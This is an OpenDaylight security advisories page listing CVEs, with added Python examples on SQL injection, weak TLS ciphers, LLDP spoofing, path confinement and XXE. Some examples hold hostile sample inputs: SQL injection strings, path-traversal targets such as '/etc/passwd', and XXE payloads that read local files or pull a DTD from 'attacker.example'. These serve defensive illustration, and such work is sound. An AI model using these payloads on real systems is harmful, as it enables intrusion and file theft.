
Security:Advisories

This page lists all security vulnerabilities fixed in OpenDaylight. Each vulnerability is assigned a security impact rating on a four-point scale (low, moderate, important and critical). The versions that are affected by each vulnerability are also listed.


[Moderate] CVE-2017-1000357 Denial of service when a switch refuses to receive packets from the controller

Description

This vulnerability affects the OpenDaylight odl-l2switch-switch feature, which provides OpenFlow-based Layer 2 switching.

Affected versions

  • Lithium (all SRs, will not be patched)
  • Beryllium (all SRs, will not be patched)
  • Boron

Patch commit(s)

  • TBA

Mitigations

Restricting access to the management network to ensure that only known, trusted devices can connect to the OpenFlow ports of OpenDaylight should minimize or eliminate the risk.

Credit

[Moderate] CVE-2017-1000358 Controller throws an exception and does not allow the user to add subsequent flows for a particular switch

Description

The flaw is in the OpenDaylight odl-restconf feature: once the exception has been thrown, no further flows can be added for the affected switch.

Affected versions

  • Beryllium (all SRs, will not be patched)
  • Boron

Patch commit(s)

  • TBA

Mitigations

Ensuring that only trusted, restricted users can add flows to devices, and that they do not repeatedly add the same flow, should minimize or eliminate the risk of the attack.

Credit

Reported by Andi Bidaj here: https://aaltodoc.aalto.fi/bitstream/handle/123456789/21584/master_Bidaj_Andi_2016.pdf

[Low] CVE-2017-1000359 Java out of memory error and significant increase in resource consumption

Description

OpenDaylight odl-mdsal-xsql is vulnerable to this flaw.

Affected versions

  • Lithium (all SRs, will not be patched)
  • Beryllium (all SRs, will not be patched)
  • Boron <= SR2 (patched in SR3)

Patch commit(s)

Mitigations

Restricting access to ports 40004 and 34343 to ensure only trusted entities can send data to the XSQL service should minimize or eliminate the risk.

Credit

Reported by Andi Bidaj here: https://aaltodoc.aalto.fi/bitstream/handle/123456789/21584/master_Bidaj_Andi_2016.pdf

[Low] CVE-2017-1000360 StreamCorruptedException and NullPointerException in OpenDaylight odl-mdsal-xsql

Description

The controller throws exceptions to the console. The affected component is OpenDaylight odl-mdsal-xsql.

Affected versions

  • Lithium (all SRs, will not be patched)
  • Beryllium (all SRs, will not be patched)
  • Boron <= SR2 (patched in SR3)

Patch commit(s)

Mitigations

Restricting access to ports 40004 and 34343 to ensure only trusted entities can send data to the XSQL service should minimize or eliminate the risk.

Credit

Reported by Andi Bidaj here: https://aaltodoc.aalto.fi/bitstream/handle/123456789/21584/master_Bidaj_Andi_2016.pdf

[Moderate] CVE-2017-1000361 DOMRpcImplementationNotAvailableException when sending Port-Status packets to OpenDaylight

Description

The controller throws exceptions and consumes additional CPU resources when it receives such Port-Status packets. The affected component is the OpenDaylight controller.

Affected versions

  • Lithium (all SRs, will not be patched)
  • Beryllium (all SRs, will not be patched)
  • Boron

Patch commit(s)

  • TBA

Mitigations

Restricting access to the management network to ensure that only known, trusted devices can connect to the OpenFlow ports of OpenDaylight should minimize or eliminate the risk.

Credit

Reported by Andi Bidaj here: https://aaltodoc.aalto.fi/bitstream/handle/123456789/21584/master_Bidaj_Andi_2016.pdf

[Moderate] CVE-2016-2183 The DES/3DES cipher used as part of TLS/SSL protocol is not secure

Description

A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol (the SWEET32 birthday attack). A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between a TLS/SSL server and client if the communication used a DES/3DES-based ciphersuite.

Affected versions

  • Helium (all versions)
  • Lithium (all versions)
  • Beryllium (all versions)
  • Boron and Boron SR1

Patch commit(s)

Patched Versions

The Boron SR2 release will fix this vulnerability.

Credit

This issue was reported to the OpenDaylight security team and fixed by Ryan Goulding.

[Important] CVE-2016-4970 netty: unspecified vulnerability leading to denial of service

Description

OpenDaylight includes netty as a dependency. An unspecified vulnerability was found in netty, leading to a remote denial of service (DoS).

Affected versions

All releases of OpenDaylight Beryllium are vulnerable.

Patch commit(s)

Patched Versions

The Beryllium SR3 release will include a patch for this issue.

[Critical] CVE-2015-7501 commons-collections: remote code execution due to insecure deserialization

Description

OpenDaylight includes Apache commons-collections as a dependency of karaf. It was found that some commons-collections classes could allow an attacker to achieve remote code execution upon deserialization. This is only exploitable if an interface deserializes arbitrary user-supplied content, and the vulnerable classes are on the classpath. While OpenDaylight includes the vulnerable classes, it does NOT expose any interface that deserializes arbitrary user-supplied content, and is NOT AFFECTED by this vulnerability.

Affected versions

OpenDaylight is not affected by this vulnerability. The vulnerable classes are being patched as a hardening measure, as tracked here: https://bugs.opendaylight.org/show_bug.cgi?id=4668

[Moderate] CVE-2015-3414 CVE-2015-3416 AAA: SQLite memory corruption leading to DoS and possible code execution

Description

The Helium release of AAA builds SQL statements by string concatenation of user-supplied values. This theoretically exposes an SQL injection vulnerability, but testing has revealed no cases that could cross a trust boundary and be useful to an attacker. However, because users can thereby manipulate the SQL statements directly, AAA exposes two underlying memory corruption vulnerabilities in SQLite (CVE-2015-3414 and CVE-2015-3416). Another vulnerability in SQLite was also reported (CVE-2015-3415), but AAA does not expose it, because exploiting it requires injecting DDL and AAA only allows an attacker to inject DML.
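The following is an added illustration of the pattern described above, written for this page; it is not AAA's code and the table and rows are constructed. The first query concatenates the caller's value into the SQL text, so attacker-chosen SQL (DML only, since the statement is a SELECT) is evaluated by the SQLite engine; the second binds the value as a parameter, so it never alters the statement and the engine never sees attacker-controlled SQL.

```python
import sqlite3

# Constructed sample rows standing in for an AAA user table; not OpenDaylight's schema.
SAMPLE_USERS = [("admin", "admin-domain"), ("alice", "tenant-a")]


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database seeded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT NOT NULL, domain TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (name, domain) VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Concatenation, as in Helium AAA: SQL metacharacters in `name` become part of
    the statement, so the caller controls what the SQLite engine executes."""
    sql = "SELECT name, domain FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str) -> list:
    """Parameterised query: `name` is bound as data and cannot change the statement."""
    return conn.execute(
        "SELECT name, domain FROM users WHERE name = ?", (name,)
    ).fetchall()


def demo() -> dict:
    """Run both variants against two classic payloads and return the rows each yields."""
    conn = make_db()
    # Tautology: closes the string literal and appends an always-true clause.
    tautology = "nobody' OR '1'='1"
    # UNION: makes the engine evaluate an attacker-chosen expression (sqlite_version()).
    # This is the kind of attacker-controlled DML that reaches SQLite's internals.
    union = "x' UNION SELECT sqlite_version(), 'x"
    return {
        "tautology_vulnerable": find_user_vulnerable(conn, tautology),
        "tautology_safe": find_user_safe(conn, tautology),
        "union_vulnerable": find_user_vulnerable(conn, union),
        "union_safe": find_user_safe(conn, union),
    }


if __name__ == "__main__":
    for mode, rows in demo().items():
        print(f"{mode:22s} -> {rows}")
```

The tautology payload makes the concatenated query return every user, and the UNION payload returns the SQLite version string, showing that arbitrary expressions reach the engine; the parameterised variant returns nothing for either input.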

Affected versions

All releases of OpenDaylight Helium are vulnerable.

Patch commit(s)

Patched Versions

The Lithium GA release includes a patch for these issues. You can download it here:

https://nexus.opendaylight.org/content/groups/public/org/opendaylight/integration/distribution-karaf/0.3.0-Lithium/

The Helium SR4 release may include a patch for these issues, and a bug has been filed to track development of a patch.

Credit

This issue was reported to the OpenDaylight security team by Ryan Goulding.

[Moderate] CVE-2015-4000 OpenDaylight: TLS connections which support export grade DHE key-exchange are vulnerable to MITM attacks (LOGJAM)

Description

It was found that various TLS interfaces exposed by OpenDaylight were affected by the LOGJAM vulnerability. A man-in-the-middle attacker could use this flaw to perform a variety of attacks, potentially leading to the trivial decryption of ciphertext.
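The following is an added check written for this page, covering both the DES/3DES (SWEET32, CVE-2016-2183) entry above and the LOGJAM entry here; it is not OpenDaylight code. It classifies cipher suite names by the weaknesses these advisories describe, builds a client context that excludes them, audits a context's enabled suites, and probes a server by offering only a weak cipher specification. The probe is an assumption about how a deployment would be checked, not a tool the project ships; it cannot see the size of a server's DHE group (Python's ssl module does not expose it), so 1024-bit DHE parameters, the other half of LOGJAM, need a separate check with a tool such as openssl s_client.

```python
import re
import socket
import ssl

# Tokens that mark a suite as weak, in OpenSSL ("DES-CBC3-SHA") and IANA
# ("TLS_RSA_WITH_3DES_EDE_CBC_SHA") naming.  Reasons reference the issues on this page.
_WEAK_TOKENS = {
    "DES": "64-bit block cipher: SWEET32 (CVE-2016-2183)",
    "3DES": "64-bit block cipher: SWEET32 (CVE-2016-2183)",
    "DES40": "export-grade DES: SWEET32 (CVE-2016-2183) and export-strength keys",
    "EXP": "export-grade suite: Logjam-class downgrade (CVE-2015-4000)",
    "EXP1024": "export-grade suite: Logjam-class downgrade (CVE-2015-4000)",
    "EXPORT": "export-grade suite: Logjam-class downgrade (CVE-2015-4000)",
    "ADH": "anonymous key exchange: no server authentication",
    "AECDH": "anonymous key exchange: no server authentication",
    "ANON": "anonymous key exchange: no server authentication",
    "NULL": "no encryption",
    "RC4": "RC4 keystream biases",
}


def weak_suite_reasons(suite_name: str) -> list:
    """Return the list of reasons a suite name is weak (empty list if none apply)."""
    reasons = []
    for tok in re.split(r"[-_]", suite_name.upper()):
        reason = _WEAK_TOKENS.get(tok)
        if reason and reason not in reasons:
            reasons.append(reason)
    return reasons


def hardened_client_context() -> ssl.SSLContext:
    """Client context restricted to forward-secret AES-GCM suites (TLS 1.3 suites are
    governed separately by OpenSSL and are all acceptable)."""
    ctx = ssl.create_default_context()
    ctx.set_ciphers("ECDHE+AESGCM:DHE+AESGCM:!aNULL:!eNULL:!EXPORT:!DES:!3DES:!RC4:!MD5")
    return ctx


def audit_context(ctx: ssl.SSLContext) -> list:
    """List (suite, reasons) for every enabled suite that matches a weak token."""
    findings = []
    for cipher in ctx.get_ciphers():
        reasons = weak_suite_reasons(cipher["name"])
        if reasons:
            findings.append((cipher["name"], reasons))
    return findings


def server_accepts_weak(host: str, port: int, cipher_spec: str, timeout: float = 5.0):
    """Offer only `cipher_spec` (e.g. "3DES" or "EXPORT") to host:port over TLS <= 1.2.
    True  -> the server negotiated a weak suite (vulnerable)
    False -> the server refused the handshake
    None  -> the local OpenSSL cannot offer those suites, so the probe is inconclusive"""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE          # probing cipher policy, not identity
    ctx.maximum_version = ssl.TLSVersion.TLSv1_2  # set_ciphers() does not cover TLS 1.3
    try:
        ctx.set_ciphers(cipher_spec)
    except ssl.SSLError:
        return None
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                name, _protocol, _bits = tls.cipher()
                return bool(weak_suite_reasons(name))
    except (ssl.SSLError, OSError):
        return False


if __name__ == "__main__":
    print("hardened context weak suites:", audit_context(hardened_client_context()))
    # Example probe against a controller's RESTCONF/HTTPS port (8443 is an assumption).
    print("3DES accepted:", server_accepts_weak("controller.example", 8443, "3DES"))
```

A None result from the probe is common on current distributions, whose OpenSSL no longer includes export or 3DES suites; in that case run the probe from a host with an older toolchain, or use a dedicated scanner.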

Affected versions

All releases of OpenDaylight Helium are vulnerable.

Patch commit(s)

Patched Versions

The Lithium GA release includes a patch for this issue. You can download it here:

https://nexus.opendaylight.org/content/groups/public/org/opendaylight/integration/distribution-karaf/0.3.0-Lithium/

The Helium SR4 release will include a patch for this issue.

Credit

This issue was reported to the OpenDaylight security team by Randy Randhawa.

[Low] CVE-2015-1857 MD-SAL: information disclosure

Description

It was found that the OpenDaylight MD-SAL API docs did not require authentication. The API docs contain potentially sensitive information, such as which devices are mounted on the server. A remote, unauthenticated attacker could use this flaw to gain information about the OpenDaylight server that could assist in the exploitation of another vulnerability.

Affected versions

All releases of OpenDaylight Helium are vulnerable.

Patch commit(s)

Patched Versions

The Helium SR4 release will include a patch for this issue. Given its low impact, a patch asynchronous to the existing release schedule will not be produced.

Credit

This issue was reported by Ryan Goulding.

[Important] CVE-2015-1778 OpenDaylight: authentication bypass

Description

It was found that the custom authentication realm used by karaf-tomcat's "opendaylight" realm would authenticate any username and password combination. The custom realm is work-in-progress code that is not yet suitable for production use. A remote attacker could use this flaw to access interfaces secured using the opendaylight realm, such as the northbound neutron API. The opendaylight realm has been updated to use UserDatabaseRealm, which reads credentials from the tomcat-users.xml file.

This issue does not affect the Lithium branch.

Affected versions

All releases of OpenDaylight Helium are vulnerable.

Patch commit(s)

Patched Versions

The Helium SR3 release includes a patch for this issue. You can download it here:

https://nexus.opendaylight.org/content/repositories/public/org/opendaylight/integration/distribution-karaf/0.2.3-Helium-SR3/

Credit

This issue was reported by Flavio Fernandes of Red Hat.

[Moderate] CVE-2015-1611 CVE-2015-1612 openflowplugin: topology spoofing via LLDP

Description

It has been reported that it is possible for an attacker to spoof network topology via LLDP. An attacker can inject crafted LLDP packets that announce internal links between switches, thereby affecting the flow of data in the SDN network. Further technical details are available in a conference paper.

Affected versions

All releases of openflowplugin are vulnerable.

Patch commit(s)

Patched Versions

The Helium SR3 release includes a patch for this issue. You can download it here:

https://nexus.opendaylight.org/content/repositories/public/org/opendaylight/integration/distribution-karaf/0.2.3-Helium-SR3/

Note that the patch does not prevent an attacker capable of acting as a man-in-the-middle from exploiting this issue.
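The following added example, written for this page, sketches one way a controller can authenticate the discovery frames it emits so that a host cannot forge them, and shows why such a patch still does not stop a man-in-the-middle. It is not openflowplugin's code and not necessarily the scheme the patch uses: the frame layout follows LLDP's TLV encoding, but the authentication TLV (OUI and subtype) and the HMAC key are illustrative assumptions. The forged frame fails verification; a genuine frame captured on one link and re-injected elsewhere still verifies, so the controller learns a link that does not exist.

```python
import hashlib
import hmac
import struct

# LLDP TLV types (IEEE 802.1AB). Header: 7-bit type, 9-bit length, big-endian.
TLV_END, TLV_CHASSIS_ID, TLV_PORT_ID, TLV_TTL, TLV_ORG = 0, 1, 2, 3, 127
# Placeholder OUI/subtype for the authentication TLV (illustrative, not an assigned OUI
# and not the project's encoding).
AUTH_OUI, AUTH_SUBTYPE = b"\x00\x00\x00", 0x01
TAG_LEN = 16  # truncated HMAC-SHA256 tag


def tlv(tlv_type: int, value: bytes) -> bytes:
    """Encode one TLV; the 9-bit length field limits values to 511 bytes."""
    if not (0 <= tlv_type < 128 and len(value) < 512):
        raise ValueError("TLV type or length out of range")
    return struct.pack("!H", (tlv_type << 9) | len(value)) + value


def parse_tlvs(frame: bytes) -> list:
    """Decode TLVs up to and including the End TLV; reject truncated frames."""
    out, i = [], 0
    while i + 2 <= len(frame):
        (hdr,) = struct.unpack_from("!H", frame, i)
        tlv_type, length = hdr >> 9, hdr & 0x1FF
        i += 2
        value = frame[i:i + length]
        if len(value) != length:
            raise ValueError("truncated TLV")
        i += length
        out.append((tlv_type, value))
        if tlv_type == TLV_END:
            break
    return out


def _tag(chassis: bytes, port: bytes, key: bytes) -> bytes:
    """HMAC over the length-prefixed source identifiers the controller wants to protect."""
    msg = struct.pack("!H", len(chassis)) + chassis + struct.pack("!H", len(port)) + port
    return hmac.new(key, msg, hashlib.sha256).digest()[:TAG_LEN]


def build_discovery_frame(chassis: bytes, port: bytes, key: bytes, ttl: int = 120) -> bytes:
    """Controller-originated discovery frame; subtype 7 = locally assigned identifiers."""
    return (tlv(TLV_CHASSIS_ID, b"\x07" + chassis)
            + tlv(TLV_PORT_ID, b"\x07" + port)
            + tlv(TLV_TTL, struct.pack("!H", ttl))
            + tlv(TLV_ORG, AUTH_OUI + bytes([AUTH_SUBTYPE]) + _tag(chassis, port, key))
            + tlv(TLV_END, b""))


def verify_discovery_frame(frame: bytes, key: bytes):
    """Return (chassis, port) if the frame carries a valid tag, else None."""
    fields, tag = {}, None
    for tlv_type, value in parse_tlvs(frame):
        if tlv_type == TLV_CHASSIS_ID:
            fields["chassis"] = value[1:]
        elif tlv_type == TLV_PORT_ID:
            fields["port"] = value[1:]
        elif tlv_type == TLV_ORG and value[:4] == AUTH_OUI + bytes([AUTH_SUBTYPE]):
            tag = value[4:]
    if tag is None or "chassis" not in fields or "port" not in fields:
        return None
    if not hmac.compare_digest(tag, _tag(fields["chassis"], fields["port"], key)):
        return None
    return fields["chassis"], fields["port"]


def learn_link(frame: bytes, key: bytes, ingress_chassis: bytes, ingress_port: bytes):
    """What a controller would record on packet-in: (source, ingress) if the frame verifies.
    The tag covers only the source fields, so a relayed genuine frame is still accepted."""
    src = verify_discovery_frame(frame, key)
    return None if src is None else (src, (ingress_chassis, ingress_port))


if __name__ == "__main__":
    key = b"constructed-controller-secret"
    genuine = build_discovery_frame(b"openflow:1", b"1", key)
    forged = build_discovery_frame(b"openflow:1", b"1", b"attacker-guess")
    print("forged  :", learn_link(forged, key, b"openflow:2", b"2"))     # None
    print("genuine :", learn_link(genuine, key, b"openflow:2", b"2"))    # real link
    print("replayed:", learn_link(genuine, key, b"openflow:3", b"5"))    # bogus link
```

The replay case is the limitation stated above: an attacker positioned between two switches, or able to relay frames between them, injects nothing of their own and so cannot be distinguished from the real neighbour by any check on the frame alone.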

Credit

This issue was reported by Lei Xu of Texas A&M.

[Moderate] CVE-2015-1610 l2switch: topology spoofing via hosttracker

Description

It has been reported that it is possible for an attacker to spoof network topology via hosttracker. An attacker can abuse hosttracker by updating host location information without any validation, authentication or authorization. This makes it possible to impersonate other hosts by presenting their MAC address. The issue is related to well-known MAC spoofing attacks. Further technical details are available in a conference paper.

Affected versions

All releases of l2switch are vulnerable.

Patch commit(s)

Patches are still under development.

Patched Versions

Patched builds are not yet available. A bug has been filed to track the development of patches.

Credit

This issue was reported by Lei Xu of Texas A&M.

[Moderate] CVE-2014-8149 defense4all: users can export report data to an arbitrary file on the server's filesystem

Description

It was found that the defense4all framework's "dump" method allows a user to request that report data is exported to a file on the server's filesystem. The user can specify any path, and the server will write to it with no validation. This could be used to perform a range of attacks. For example, a critical file could be overwritten, thereby disabling the defense4all server. On Windows servers, a UNC path could be injected, potentially causing the server to write data to remote filesystems. An attacker cannot control the contents of the file, but they can define a report query that returns no results, and therefore force it to write an empty file. An error message is received if the server cannot write to the provided path. An attacker could therefore use this issue to map out the writable filesystem on the server and potentially perform more advanced attacks by manipulating special files in the /dev and /proc filesystems of Linux servers.
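The following added example, written for this page and not taken from defense4all, contrasts the shape of the flaw described above with a confined export routine. The export directory, the report name rules and the function names are assumptions. The hardened version accepts only a bare report name (no separators, so no `..`, no absolute paths and no UNC `\\server\share` forms), resolves symlinks before checking that the target is a direct child of the export directory, and refuses to write to anything that is not a regular file, which keeps /dev and /proc out of reach.

```python
import os
import re

# Illustrative server-side export directory (assumption, not defense4all's path).
EXPORT_DIR = "/var/lib/defense4all/reports"
# Allowed report names: alphanumeric start, then letters, digits, '.', '_' or '-'.
# No '/', no '\\', no leading '.', no NUL, so '..', UNC paths and hidden files are out.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


class UnsafeExportPath(ValueError):
    pass


def dump_unsafe(report_rows, path: str) -> str:
    """Shape of the flaw described above: the caller's path is used verbatim, so it can
    point at /dev or /proc entries, a UNC share on Windows, or any writable file."""
    with open(path, "w") as fh:
        fh.writelines(",".join(row) + "\n" for row in report_rows)
    return path


def resolve_export_path(base_dir: str, name: str) -> str:
    """Map a caller-supplied report name to a file strictly inside base_dir."""
    if not SAFE_NAME.match(name):
        raise UnsafeExportPath(f"report name not allowed: {name!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    # realpath follows symlinks, so a planted link inside base_dir cannot redirect the write.
    if os.path.commonpath([base, target]) != base or os.path.dirname(target) != base:
        raise UnsafeExportPath(f"resolved outside export directory: {target}")
    if os.path.lexists(target) and not os.path.isfile(target):
        raise UnsafeExportPath(f"refusing to write to a non-regular file: {target}")
    return target


def dump_safe(report_rows, name: str, base_dir: str = EXPORT_DIR) -> str:
    """Write the report (possibly empty, as in the attack above) only inside base_dir."""
    target = resolve_export_path(base_dir, name)
    # O_NOFOLLOW closes the window between the check above and the open.
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(target, flags, 0o640)
    with os.fdopen(fd, "w") as fh:
        fh.writelines(",".join(row) + "\n" for row in report_rows)
    return target


def is_accepted(base_dir: str, name: str) -> bool:
    """True if `name` would be written inside base_dir, False if the request is refused."""
    try:
        resolve_export_path(base_dir, name)
        return True
    except UnsafeExportPath:
        return False


if __name__ == "__main__":
    for candidate in ["weekly-2015.csv", "../../etc/passwd", "/dev/null",
                      "\\\\attacker\\share\\x", "/proc/self/mem", ".."]:
        print(f"{candidate!r:28s} accepted={is_accepted(EXPORT_DIR, candidate)}")
```

Note that an empty report (a query with no results) still produces a write, exactly as in the attack above; the confinement makes that write harmless rather than preventing it, which is the right trade-off when the export feature itself is legitimate.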

It was also found that defense4all was using Spring 3.0.0 RC3, a version affected by a number of vulnerabilities listed on the Pivotal security advisories page: http://www.pivotal.io/security

Affected versions

All releases of defense4all <= 1.1.0 built before 15 Jan 2015 are vulnerable.

Patch commit(s)

Patched Versions

Builds of defense4all on or after 15 Jan 2015 contain a patch for these issues:

https://jenkins.opendaylight.org/defense4all/job/defense4all-merge/

Please note that older builds of defense4all 1.1.0 may be vulnerable, ensure you use a build from on or after 15 Jan 2015.

Credit

These issues were reported by David Jorm of IIX.

[Important] CVE-2014-5035 netconf: XML eXternal Entity (XXE) vulnerability

Description

It was found that OpenDaylight's netconf implementation did not disable external entities when processing user-supplied XML documents. A remote attacker, if able to interact with one of OpenDaylight's netconf interfaces, could use this flaw to exfiltrate files on the OpenDaylight controller, and potentially perform more advanced XXE attacks.
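The following added example, written for this page and not OpenDaylight's netconf code, shows the check a NETCONF endpoint should make before handing a message to its XML parser: NETCONF content never legitimately carries a DTD, so any DOCTYPE is rejected, which is the same policy as the disallow-doctype-decl approach used to harden Java parsers. The messages are constructed; the inspection function reports what the DOCTYPE would have introduced (an external general entity, or an external DTD subset) without resolving anything, because no external-entity handler is installed.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(ValueError):
    pass


# Constructed NETCONF-style messages (RFC 6241 framing omitted).
BENIGN_RPC = b"""<?xml version="1.0" encoding="UTF-8"?>
<rpc message-id="101" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
  <get-config><source><running/></source></get-config>
</rpc>"""

# Classic XXE: an external general entity whose expansion would read a local file.
XXE_RPC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE rpc [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<rpc message-id="102" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
  <edit-config><target><candidate/></target><config>&xxe;</config></edit-config>
</rpc>"""

# External DTD subset: a parser that fetches it lets the attacker's DTD define entities.
EXTERNAL_DTD_RPC = b"""<?xml version="1.0"?>
<!DOCTYPE rpc SYSTEM "http://attacker.example/evil.dtd">
<rpc message-id="103" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"><get/></rpc>"""


def inspect_dtd(data: bytes) -> dict:
    """Walk the prolog with expat and report the DOCTYPE plus every entity declaration
    that points outside the document (SYSTEM/PUBLIC identifier) or is a parameter entity.
    Nothing is resolved: no ExternalEntityRefHandler is installed."""
    findings = {"doctype": None, "external": [], "parameter": []}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings["doctype"] = name
        if system_id or public_id:
            findings["external"].append(("<!DOCTYPE>", system_id or public_id))

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        if system_id or public_id:
            findings["external"].append((name, system_id or public_id))
        if is_parameter:
            findings["parameter"].append(name)

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)
    return findings


def parse_netconf(data: bytes) -> ET.Element:
    """Reject any message carrying a DOCTYPE, then parse the rest normally."""
    findings = inspect_dtd(data)
    if findings["doctype"] is not None:
        detail = findings["external"] or findings["parameter"] or "internal subset only"
        raise UnsafeXML(f"DOCTYPE <{findings['doctype']}> rejected: {detail}")
    return ET.fromstring(data)


def is_accepted(data: bytes) -> bool:
    """True if the message parses under the policy, False if it is refused or malformed."""
    try:
        parse_netconf(data)
        return True
    except (UnsafeXML, ET.ParseError):
        return False


if __name__ == "__main__":
    for label, msg in [("benign", BENIGN_RPC), ("xxe", XXE_RPC), ("ext-dtd", EXTERNAL_DTD_RPC)]:
        print(f"{label:8s} accepted={is_accepted(msg)} findings={inspect_dtd(msg)}")
```

Rejecting the DOCTYPE outright is simpler and safer than trying to allow "harmless" internal subsets, which still permit entity-expansion denial of service; on the Java side the equivalent is to set the disallow-doctype-decl feature on the parser factory before any user-supplied document is parsed.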

Affected versions

OpenDaylight Helium GA and SR1 are both affected.

Patch commit(s)

Patched Versions

Helium-SR1.1, which includes the patches applied to stable/helium for this issue, can be downloaded here:

https://nexus.opendaylight.org/content/repositories/public/org/opendaylight/integration/distribution-karaf/0.2.1-Helium-SR1.1/

Credit

This issue was reported by Gregory Pickett of Hellfire Security.